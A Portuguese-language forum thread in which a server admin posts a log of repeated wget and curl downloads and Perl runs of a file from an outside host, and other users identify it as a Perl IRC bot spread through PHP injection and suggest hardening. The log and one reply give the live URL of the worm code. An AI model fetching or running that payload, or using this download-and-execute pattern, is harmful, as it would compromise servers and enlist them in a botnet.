Possível Falha de segurança

Boas,

Agradecia opiniões sobre uma situação que detectei num dos servidores web da minha empresa.
Pelo que os logs indicam, acho que pode estar a ocorrer uma brecha de segurança no apache ou o iptables não está a funcionar correctamente.

Detectei o seguinte no error.log do apache:

--22:22:23-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 115.03 KB/s

22:22:23 (115.03 KB/s) - `2m0rgan.txt' saved [29940/29940]

--22:22:24-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... --22:22:27-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 56.94 KB/s

22:22:28 (56.94 KB/s) - `2m0rgan.txt' saved [29940/29940]

sh: print: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
2m0rgan.txt has sprung into existence.
Retrying.

100 29940 100 29940 0 0 32649 0 --:--:-- --:--:-- --:--:-- 44094
--22:22:30-- http://icezinhu.by.ru/2m0rgan.txt
(try: 2) => `2m0rgan.txt.1'
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 68.30 KB/s

utime(2m0rgan.txt.1): No such file or directory
22:22:31 (68.30 KB/s) - `2m0rgan.txt.1' saved [29940/29940]

sh: print: command not found
--22:22:31-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
2m0rgan.txt has sprung into existence.
Retrying.

100 29940 100 29940 0 0 42051 0 --:--:-- --:--:-- --:--:-- 60853
sh: fetch: command not found
--22:22:32-- http://icezinhu.by.ru/2m0rgan.txt
(try: 2) => `2m0rgan.txt.1'
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 84.85 KB/s

22:22:33 (84.85 KB/s) - `2m0rgan.txt.1' saved [29940/29940]

sh: print: command not found
Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
--22:22:33-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... ..
100 29940 100 29940 0 0 50791 0 --:--:-- --:--:-- --:--:-- 87034
.......sh: fetch: command not found
. ......... 100% 33.99 KB/s

22:22:34 (33.99 KB/s) - `2m0rgan.txt' saved [29940/29940]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

14 29940 14 4344 0 0 10803 0 0:00:02 --:--:-- 0:00:02 10803--22:22:35-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt.1'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K ........
100 29940 100 29940 0 0 32974 0 --:--:-- --:--:-- --:--:-- 50685
.. .......... ..Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
sh: fetch: command not found
....... 100% 87.47 KB/s

utime(2m0rgan.txt.1): No such file or directory
22:22:35 (87.47 KB/s) - `2m0rgan.txt.1' saved [29940/29940]

Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 29940 100 29940 0 0 39766 0 --:--:-- --:--:-- --:--:-- 58135
--22:22:37-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
200 OK
Length: 29,940 (29K) [text/plain]
2m0rgan.txt has sprung into existence.
Retrying.

--22:22:38-- http://icezinhu.by.ru/2m0rgan.txt
(try: 2) => `2m0rgan.txt.1'
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... sh: fetch: command not found
200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 48.37 KB/s

22:22:39 (48.37 KB/s) - `2m0rgan.txt.1' saved [29940/29940]

Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
--22:22:40-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 68.64 KB/s

22:22:41 (68.64 KB/s) - `2m0rgan.txt' saved [29940/29940]

sh: print: command not found
Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
sh: fetch: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- 0:00:03 --:--:-- 0
100 29940 100 29940 0 0 8186 0 0:00:03 0:00:03 --:--:-- 70613
Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
sh: fetch: command not found
--22:22:45-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 86.04 KB/s

22:22:46 (86.04 KB/s) - `2m0rgan.txt' saved [29940/29940]

sh: print: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0
100 29940 100 29940 0 0 5364 0 0:00:05 0:00:05 --:--:-- 88318
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
19 29940 19 5792 0 0 7335 0 0:00:04 --:--:-- 0:00:04 33871
100 29940 100 29940 0 0 21518 0 0:00:01 0:00:01 --:--:-- 38732
--22:22:48-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]
2m0rgan.txt has sprung into existence.
Retrying.

Missing right curly or square bracket at 2m0rgan.txt line 281, at end of line
syntax error at 2m0rgan.txt line 281, at EOF
Execution of 2m0rgan.txt aborted due to compilation errors.
sh: fetch: command not found
--22:22:49-- http://icezinhu.by.ru/2m0rgan.txt
(try: 2) => `2m0rgan.txt.1'
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... .....sh: fetch: command not found
.... 100% 68.53 KB/s

utime(2m0rgan.txt.1): No such file or directory
22:22:50 (68.53 KB/s) - `2m0rgan.txt.1' saved [29940/29940]

sh: print: command not found
Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
--22:22:50-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 85.76 KB/s

22:22:51 (85.76 KB/s) - `2m0rgan.txt' saved [29940/29940]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
57 29940 57 17376 0 0 36764 0 --:--:-- --:--:-- --:--:-- 70634
100 29940 100 29940 0 0 53449 0 --:--:-- --:--:-- --:--:-- 89909
Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
--22:22:52-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... sh: fetch: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0
100 29940 100 29940 0 0 5315 0 0:00:05 0:00:05 --:--:-- 89107
sh: fetch: command not found
217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 85.26 KB/s

22:23:05 (85.26 KB/s) - `2m0rgan.txt' saved [29940/29940]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 29940 100 29940 0 0 46763 0 --:--:-- --:--:-- --:--:-- 72144
--22:23:08-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt.1'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... ..sh: fetch: command not found
........ ......... 100% 68.22 KB/s

utime(2m0rgan.txt.1): No such file or directory
22:23:08 (68.22 KB/s) - `2m0rgan.txt.1' saved [29940/29940]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
14 29940 14 4344 0 0 13136 0 0:00:02 --:--:-- 0:00:02 49931
100 29940 100 29940 0 0 50765 0 --:--:-- --:--:-- --:--:-- 86531
sh: fetch: command not found
--22:23:23-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 84.51 KB/s

22:23:23 (84.51 KB/s) - `2m0rgan.txt' saved [29940/29940]

sh: print: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 29940 100 29940 0 0 52831 0 --:--:-- --:--:-- --:--:-- 88842
sh: fetch: command not found
--22:23:27-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... --22:23:31-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .....217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... ..... ....connected.
HTTP request sent, awaiting response... ..200 OK
Length: 29,940 (29K) [text/plain]

0K ...... .............. ........ 100% 49.71 KB/s

22:23:32 (49.71 KB/s) - `2m0rgan.txt' saved [29940/29940]

..... ....sh: print: command not found
..... 100% 86.93 KB/s

22:23:32 (86.93 KB/s) - `2m0rgan.txt' saved [29940/29940]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 29940 100 29940 0 0 52761 0 --:--:-- --:--:-- --:--:-- 89373
sh: fetch: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- 0:00:08 --:--:-- 0--22:23:41-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt.1'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response...
100 29940 100 29940 0 0 3492 0 0:00:08 0:00:08 --:--:-- 88318
200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 56.97 KB/s

utime(2m0rgan.txt.1): No such file or directory
22:23:41 (56.97 KB/s) - `2m0rgan.txt.1' saved [29940/29940]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 29940 100 29940 0 0 45555 0 --:--:-- --:--:-- --:--:-- 70947
sh: fetch: command not found
sh: fetch: command not found
Can't open perl script "2m0rgan.txt": No such file or directory.
Use -S to search $PATH for it.
--22:24:10-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 68.89 KB/s

22:24:11 (68.89 KB/s) - `2m0rgan.txt' saved [29940/29940]

sh: print: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 29940 100 29940 0 0 40538 0 --:--:-- --:--:-- --:--:-- 59053
sh: fetch: command not found
--22:24:14-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 37.83 KB/s

22:24:15 (37.83 KB/s) - `2m0rgan.txt' saved [29940/29940]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
33 29940 33 10136 0 0 25252 0 0:00:01 --:--:-- 0:00:01 59274
100 29940 100 29940 0 0 45618 0 --:--:-- --:--:-- --:--:-- 70281
sh: fetch: command not found
--22:26:05-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 85.12 KB/s

22:26:05 (85.12 KB/s) - `2m0rgan.txt' saved [29940/29940]

sh: print: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0
100 29940 100 29940 0 0 5385 0 0:00:05 0:00:05 --:--:-- 89107
sh: fetch: command not found
--22:26:19-- http://icezinhu.by.ru/2m0rgan.txt
=> `2m0rgan.txt'
Resolving icezinhu.by.ru... 217.16.29.51
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--22:26:53-- http://icezinhu.by.ru/2m0rgan.txt
(try: 2) => `2m0rgan.txt'
Connecting to icezinhu.by.ru|217.16.29.51|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 29,940 (29K) [text/plain]

0K .......... .......... ......... 100% 84.94 KB/s

22:26:54 (84.94 KB/s) - `2m0rgan.txt' saved [29940/29940]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 29940 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0
86 29940 86 26064 0 0 4670 0 0:00:06 0:00:05 0:00:01 74896
100 29940 100 29940 0 0 5364 0 0:00:05 0:00:05 --:--:-- 85787
sh: fetch: command not found
connect: Connection refused at 2m0rgan.txt line 450.
connect: Connection refused at 2m0rgan.txt line 450.
connect: Connection refused at 2m0rgan.txt line 450.
connect: Connection refused at 2m0rgan.txt line 450.
connect: Connection refused at 2m0rgan.txt line 450.
connect: Connection refused at 2m0rgan.txt line 450.
connect: Connection refused at 2m0rgan.txt line 450.
connect: Connection refused at 2m0rgan.txt line 450.

Re: Possível Falha de segurança

Ta mais pra um usuário tentando baxar um bot de irc feito em perl do que uma falha de seguranca....
sei nao, mas se vc eh desse admins paranoicos existe um modo como blokear url através de uma substring dessa url.
ou seja, vc pode bloquear o download desse arquivo blokeando url q contenham a string 2m0rgan por exemplo

espero ter ajudado, ateh mais

Re: Possível Falha de segurança

Isso pareçe-me um Log do wget... e nao do apache..
contudo é possivel que isso seja um worm a tentar instalar um bot ou uma backdoor...
e bloquear a URL n serve de nd.. pq se ele já está a tentar instalar algo, é pq já entrou, agr o resto é análise...
vê se n tens algum site/aplicação vulneravel..
99% das vezes costuma ser devido á má programação dos sites dos nossos clientes..
eu mesmo tenho todos os clientes com um php.ini mto restrito, pq sei que muitos deles cometem erros gravissimos na programaçao dos seus sites, e quem leva por tabela é o meu servidor..
muitas paginas web sofrem de bugs de "include".. ve se nao é isso...
e outra coisa.. faz um chmod 700 ao wget, ao fecth, ao lynx , ao curl.. e ao perl...
e aconselho te a estares atento a qualquer movimento suspeito ;)
Um abraço.

Re: Possível Falha de segurança

cara...

vc pode testar este servidor com o nessus, se houver alguma falha de segurança o mesmo irá te informar, e ainda te fornece como resolver :)

valeu

Re: Possível Falha de segurança

Lamento informar, nessus não vai adiantar.

O bot do morgan é um script em perl que varre o google atrás de falhas de PHP-INJECTION. Quando encontra uma máquina com a vulnerabilidade ele utiliza os comandos, wget , lwp-download, curl, fetch (bsd), e lynx para ser baixado para a maquina. Uma vez dentro da maquina ele passa a ser mais uma maquina zumbi. Seu problema é facil de resolver. Desabilite o passtrhu, o shell_exec, system() do php.ini.
Espero ter ajudado.
Qualquer coisa me procure no msn. [email protected]

Abraço

Re: Possível Falha de segurança

interessante saber disso...

como não tenho muita experiência com servidor apache, essa iformação pra mim foi útil

Re: Possível Falha de segurança

Exacto... tal como eu suspeitava...
acessem o site e vejam

http://icezinhu.by.ru/2m0rgan.txt

o codigo do worm...
Realmente colega, o seu problema é mm na configuraç\ao do PHP...
como eu tinha dito, os nossos servidores acabam em levar por tabelam devido á má programação dos nossos clientes..
fique atento..